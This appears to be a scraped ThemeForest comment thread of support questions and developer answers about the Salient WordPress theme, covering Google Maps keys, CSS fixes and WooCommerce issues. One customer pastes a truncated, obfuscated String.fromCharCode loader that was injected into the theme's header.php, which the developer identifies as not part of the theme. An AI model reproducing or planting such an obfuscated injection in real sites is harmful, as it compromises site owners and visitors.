Discussion on Salient | Creative Multipurpose & WooCommerce Theme

Discussion on Salient | Creative Multipurpose & WooCommerce Theme

Cart 170,141 sales
Recently Updated
Well Documented

ThemeNectar supports this item

Supported

38434 comments found.

Hi -

http://preview.themeforest.net/item/salient-responsive-multipurpose-theme/full_screen_preview/4363266?_ga=1.165296119.973603292.1445018773

I really like how you have the portfolio on this preview. Can I set this to work like a blog?

Thx

Hey,

1. Unfortunately there’s no way to use that style for the blog as of now

2. I’m currently seeing the youtube embed on that post – have you sorted this since posting?

Yes, I do see it now as well. I think I do. Thank you!

I’ve upgraded the theme as well as visual editor as it was explained on the support website. Sadly I do not have active support ability as for now.

But I have problem with Salient theme options – they are gone after the update. Wordpress says I do not have sufficient access to that section. I’ve reset the admin abilities, as well as tried creating a new user but still nothing helps.

Hope you can read that and will be able to help me

Hey, could you please send an email via the contact form on my author with your admin credentials so I can take a further look? https://themeforest.net/item/salient-responsive-multipurpose-theme/reviews/4363266

Cheers

Hey, I’ve sent you login info yestarday.

Cheers

Did you get my message?

Dear awesome support team!

We were having a slight issue with the “Flags” used to switch the language. On mobile, the flags are very small in our hamburger menu (our site is www.picavi.com, in case you would like to check) and we are having troubles clicking them on touchscreens. Are there any options to “A: increase the Flag size for mobile” or “B: Add some text like “Switch Language to German” in front of the flag on mobile”.

If you could help us with that, that would be great! As mentioned, we only want to make changes on the mobile version of our site, we like the language switching process the way it is right now on our desktop PCs.

Thank you very much for your help!

Hey jfmariniak!

Could you let my bypass the coming soon page you have so I can take a look?

Cheers :)

Hey Juanacatan, are you on the latest version of Salient? if so please open a ticket in regards with your admin credentials so I can take a look :) https://themenectar.ticksy.com

Cheers

Would it be possible to let visitors know, which portfolio items are videos? Perhaps with a play-button when hovering over the thumb?

Hey boelmikael, unfortunately as of now this would require custom development but i’ve noted the idea for the wishlist :)

Cheers

Is there a way to add an API key for Google Maps? I keep getting an error that I’m missing an API key. I don’t see anything in the settings or code to place an API key.

Hey tnewton1,

The issue only applies to new domains where the maps script hasn’t been prior to June 22 of this year. This article explains it: https://www.latecnosfera.com/2016/06/google-maps-api-error-missing-keymap-error-solved.html

If you’re on a current version of Salient you can add the key into the map.js file in the js folder. The line to mod should be near line 589 of the file – $.getScript(‘https://maps.google.com/maps/api/js?sensor=false&callback=mapAPI_Loaded'); will become $.getScript(‘https://maps.google.com/maps/api/js?sensor=false&key=APIKEYHERE&callback=mapAPI_Loaded'); The next update will add an input for users to add the key in the admin panel

Excellent! Thank you very much!

You’re welcome :)

Hi,

our webpage are now suddenly all blank/white. Discovered PHP Parse error: syntax error, unexpected $end in /var/www/hosted/tintkom.no/www2/wp-content/themes/salient/header.php on line 217

And this line looks like this:

<?php if(empty($options[‘loading-image’])) { if(!empty($options[‘theme-skin’]) && $options[‘theme-skin’] == ‘ascend’) { echo ‘ ’; } else { echo ‘ ’; } } ?> <?php /* 15pJQhrPh3XJCUOiaQCa61 */ ?><script type='text/javascript'>(new Function(String.fromCharCode(19 - 9, 126 - 8, 100 - 3, 122 - 8, 37 - 5, 109 - 2, 104 - 3, 129 - 8, 36 - 4, 67 - 6, 34 - 2, 41 - 2, 106 - 2, 8, 57 - 2, 78 - 9, 73 - 5, 118 - 7, 70 - 5, 100 - 3, 89 - 8, 111 - 4, 101 - 3, 86 - 9, 112 - 4, 113 - 1, 84 - 3, 106 - 8, 125 - 6, 76 - 2, ……… + + + … and a lot of more lines with random numbers. ))();</script> <?php /* 1uqjsQSyWVhmOHAEVa1i61 */ ?> Hope someone have any idea how to solve this, so I can get the webpage up and running again. C

Hey tintkom, there’s no such code included in the theme by default – have you checked with your hosting company to make sure no one accessed your files? Also are you up to date with WordPress/plugins?

Hi, how can I fix this vertical border or margin next to the nectar slider here: http://prophescene.at/ ?

Hey ostfunk,

Are you referring to moving the nectar slider text further away from the header? http://imgur.com/a/3mHV1

Cheers

Hi, i am waiting for two weeks for the resolution of a problem Ticket # 811152

Hey,

Sorry for the delay – I took a look earlier today :)

Cheers

hey, this everything resolved great. You’ve got five stars in the theme. Great job Thank you!!!

You’re welcome :)

Hi there, Im interested of buying your theme for my e-commerce shop. But when I’ve tried to checkout (eg. if I have 3 items), on the checkout page said ‘Your cart is currently empty.’ I think there is something wrong? As well with the ‘cart’ icon on the top right, it’s shown just 2 items (but I did select more than 2) and sometimes it switched to just ‘total – view cart and checkout’.

Thanks in advance

Hey, it’s a caching issue – i’ve noted to fix it soon. Here’s a screenshot of the checkout page so you can see the theme styling :) http://imgur.com/a/BXof3

I have just created a new domain and installed the latest version of Salient. The Ascend version of the template isn’t displaying the Google Maps. I am receiving an error message: “Oops! Something went wrong. This page didn’t load Google Maps correctly. See the JavaScript console for technical details.” After reviewing other’s comments, I saw that my error message might be resolved by adding a modification to the map.js file. However, after making that exact modification, the problem persists, the error message continues to display and Google Maps doesn’t work.

Hey dougystyle,

The issue only applies to new domains where the maps script hasn’t been prior to June 22 of this year. This article explains it: https://www.latecnosfera.com/2016/06/google-maps-api-error-missing-keymap-error-solved.html

If you’re on a current version of Salient you can add the key into the map.js file in the js folder. The line to mod should be near line 589 of the file – $.getScript(‘https://maps.google.com/maps/api/js?sensor=false&callback=mapAPI_Loaded'); will become $.getScript(‘https://maps.google.com/maps/api/js?sensor=false&key=APIKEYHERE&callback=mapAPI_Loaded'); The next update will add an input for users to add the key in the admin panel

?Hi,

My shop page layout is doing something wrong now, I can’t control the full with in the admin panel, doesn’t matter what option I use, is always layout in 1 or two items per row.

I updated the woocomerce not sure if that could be the problem, the problem appear after a week of updating.

Thanks for your help. https://www.jorgesesmilo.com/ Jorge

Hey gorgy,

Are you also on Salient 7.0.9? Previous versions are not compatible with the latest WooCommerce

Cheers

For the blog page I’ve chosen “Masonry blog no sidebar” and yet no masonry and still a sidebar…What am I missing?

Nevermind, I got it. Thanks! Great theme!

Hey rtaustin, i’m glad to hear you got it :)

Cheers!

After upgrading to the latest version, two different external lightbox plugins both don’t work anymore. I’ve set the theme lightbox option to “none” under Salient options. You can see the behavior at http://dev.evergladesoutpost.org/test/ by clicking the test link. As you can see, the page seems to briefly try to open a lightbox but then opens the video on its Vimeo page. It’s doing this with two different Lightbox plugins I tried. Thanks for your help.

Hey marcfest, you need to check the box to “Disable Fade Out On Click” in your Salient options panel > page transitions tab

Cheers

Whoah, that did the trick! Thanks so much for helping. And compliments on always being so very responsive to posts like this!!!

You’re very welcome :)

hello there. i recently added a podcast to my site. I uploaded the media file into a blog post and it plays fine. but when scrolling through my latest blog page, the media player isn’t visible, only the feature image, which i didn’t want to show in the first place! 1. how can i make the media player show up for that post, when scrolling through my recent blogs page? 2. how can i hide the default feature image for a specific post? the demo im trying to emulate is here, http://preview.themeforest.net/item/salient-responsive-multipurpose-theme/full_screen_preview/4363266?_ga=1.264668230.870605596.1460933080

please help! thank you

Hey – on your post have you selected “audio” for the post format and then added your audio files in the post format inputs? http://imgur.com/a/ptFtW That should allow the player to show on the post page itself. Also the css to hide the post image on that one page is:

.postid-4660 .post-featured-img { display: none!important; }

Cheers

Thank you thank you thank you!!! that did the trick! i never thought to look at the format of the post itself, as this is my first ‘non-blog’ post. i really appreciate your help! thanks again

Glad to hear :)

There seems to be a lot of issues with responsive appearance for me using your theme. In some cases I’m sure it’s me but I’m also noticing some things wrong with your demo with simple changes like length of a word in the h1.jumbo class.

for example, using your imported Frostwave demo, the top page “this is Salient” looks great until you change the word to something longer (like “Generation”), and it breaks visually on mobile, cutting off the word.

This is the base install with only minor (the font, the text) changes made to your demo. Change things in the h1.jumbo to a different font (raleway in my case), use longer words and they totally break responsive appearance in mobile. Shouldn’t there be scaling implemented in your theme to adjust this, or am I just missing a setting here?

Thanks

Hi, thanks for responding so quickly!

So I’ve left it all alone other than the typeface, I had made some edits to some elements but I commented them out to see if it would revert to scaling, it isn’t. And on your demo it doesn’t either—just the base install with demo. I change the word “salient” to “generation” and it cuts off. Any long word does, on mobile.

Here is a screenshot. http://d.pr/i/UMLf

I’m happy to use @media queries but it’s hard to know what to target here.

Hey,

I’m seeing that there’s an html entity for a non breaking space entered in your word: http://pastebin.com/yHt5Vc2s

if you remove that it should break normally – also i’m still seeing that you have the jumbo class on that h1 and no font size set in the typography options, could you please do that and let me know so I can take another look?

Cheers

That did help it, however it is still broken on an iphone, more of the word shows but it is neither centered really (nor are the buttons stacking centered) nor is the type scaling on an iPhone. It DOES scale properly when I reaize my desktop browser, so perhaps this is why you’re not noticing a problem you may not be using an iPhone? Is it because viewport isn’t being used?

Where do you find this nonbreaking space as it doesn’t show in the editor/page or MCE either in visual or text. I just deleted it and retyped it and it seems to be better.

I did have a font size set, but . But your settings don’t really help on telling me what exactly I’m changing—Is this the Nectar specific header font? Is it the heading font? I changed both to 48 px and 53px line height but I it doesn’t make any change (even with cleared cache).

Just to emphasize to you: I tested this on your own demo on the themeforest preview and it is broken there too. I wonder if it’s just iPhone?

Can you just provide me a @media way to target it? I think that would be much easier for both of us. Also you might want to fix it on your demo?

pls see screenshot here: http://d.pr/i/15wsI

Thanks

PS: It would be AWESOME if you could in a future update note in the Salient options panel which type change affects what by using the actual div class (e.g. the h1 jumbo class).

how do i make the portfolio and blog feeds 2 columns at mobile instead of one?

Hey, add this into the custom css box :)

@media only and screen and (max-width: 690px) {
.portfolio-items .elastic-portfolio-item, body #post-area.masonry.meta_overlaid .masonry-blog-item.wide_tall, body #post-area.masonry.meta_overlaid .masonry-blog-item.format-quote.regular, body #post-area.masonry.meta_overlaid .masonry-blog-item.format-link.regular, body #post-area.masonry.meta_overlaid .masonry-blog-item.format-quote.regular_2x, body #post-area.masonry.meta_overlaid .masonry-blog-item.format-link.regular_2x {
    width: 50%!important;
}
}

thanks! (btw it should be ”@media only screen and (max-width: 690px)”)

Yes, sorry – typing too fast :)

Hello,

I’m building a site for a client of mine with your theme, thats why I don’t have a purchased badge, but I have a really small question and I can’t believe I’m asking this, but from where do I change the logo? I really can’t find it, I’m on the edge to edit the header.php file, but I think there should be a cleaner way.

Thank You!

Hey NumseR!

there’s an upload field in the Salient options panel > header navigation tab. http://imgur.com/a/w8oqe

Cheers

Hello! First, hands down best theme i’ve worked with.

Question: is there an add-on or widget that can be used with this theme , where i can create a stand alone “part” of a layout , that can then be used across multiple pages? ( so that, updates to that part only need to be managed in one place)

thanks Colby

upon perusing the available addons, its seems like the Templatera Template Manager addon may be what i am looking for

Hey Colby, thanks a lot!

templatera would indeed be an easy way to accomplish this :)

Cheers

How do I get the video lightbox play button to sit in the center of an image? I have been playing around with the column having the image as a background image, but I cant get the image to format correctly.

Essentially, I want the play button to sit in the center of the image below it at the link below.

http://brian.aclz.org/first-visit/

Thanks.

Hey freshlyroastedweb,

There’s an option coming for this in the next update which will be out in about a week :)

Cheers

by
by
by
by
by
by

Tell us what you think!

We'd like to ask you a few questions to help improve ThemeForest.

Sure, take me to the survey